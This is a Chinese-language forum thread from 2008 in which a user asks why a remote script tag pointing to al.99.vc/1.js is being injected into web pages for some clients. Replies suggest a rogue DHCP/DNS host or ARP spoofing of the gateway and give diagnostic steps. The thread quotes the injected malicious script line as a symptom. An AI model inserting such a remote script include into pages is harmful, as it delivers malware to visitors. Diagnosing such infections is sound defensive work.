作者 主題: [問題]網頁最上方被自動加了一行 al.99.vc/1.js  (閱讀 4418 次)

0 會員 與 1 訪客 正在閱讀本文。

TyroneYeh

  • 俺是博士!
  • *****
  • 文章數: 2396
  • 性別: 男
    • 檢視個人資料
請問各位學長們,是否有遇過網頁原始碼最上方被自動加了一行
代碼: [選擇]
<script src=http://al.99.vc/1.js</srcipt>
不過很怪的是 A 與 B Server 的網頁相同但在 C 地 Client 看到一樣的狀況!
D與F 地 Client 又是 ok 的!

C 地有些電腦在其它 Client 未開機(早上或下班後)又正常!
上網查了一下! 有寫是木馬程式,但是找不到它是在本機 Client 上中的還是 Server 上!
如果是 Server 為什麼 D與F地的 Client 會都是正常!
但C 地的大部份不正常,有一兩台是正常的!

怎麼會這樣哩! 會是 router 中獎嗎? Cisco 的應該不會吧!
要怎麼查才能找到原兇呢?
--
TyroneYeh

slime

  • 俺是博士!
  • *****
  • 文章數: 1692
    • 檢視個人資料
有種情況是這樣, 參考看看:

Client 所在的區域網路, 有台電腦中毒了, 而這台電腦有 DHCP Server 與 DNS 等功能.
原本 Client 應該取得正常的 DNS , 卻抓到了偽造的 DNS 資料, 所以:
Client -> 向中毒的電腦連線 -> 中毒的電腦向真正的網站抓資料 -> 加上惡意程式 -> 傳回給 Client .

試著:
1. 指定 Client 使用固定的 IP 與 DNS , 再連 Server (用 IP 連)看看.
2. 當 Client 發生這情況時, 檢查 DHCP 主機, 及取得的 DNS 主機等資料.

如果確定有這台惡意主機在, 再去找出主機來處理.
« 上次編輯: 2008-04-30 11:29 由 slime »
冷笑話: 我的 IP 是 127.0.0.1

TyroneYeh

  • 俺是博士!
  • *****
  • 文章數: 2396
  • 性別: 男
    • 檢視個人資料
謝謝 Slime 兄的回覆!

我是用 IP 去連線 Server 的! Client 也是固定設 Tcp/ip 不是使用 dhcp 取得 ip !
網路上的方法把那個網址加到 hosts 檔案中也沒用,因為影響到原來的網頁顯示!!
--
TyroneYeh

slime

  • 俺是博士!
  • *****
  • 文章數: 1692
    • 檢視個人資料
那我會想檢查一下 Gateway 指定的 IP , 與 Mac Address 是否有被偽造過.

例如:
正常:
192.168.1.254 -> 00:00:00:ff:ff:ff

偽造的主機
192.168.1.254 -> 00:aa:bb:cc:dd:ee

而 Client 向偽造的主機連線了.
« 上次編輯: 2008-04-30 12:12 由 slime »
冷笑話: 我的 IP 是 127.0.0.1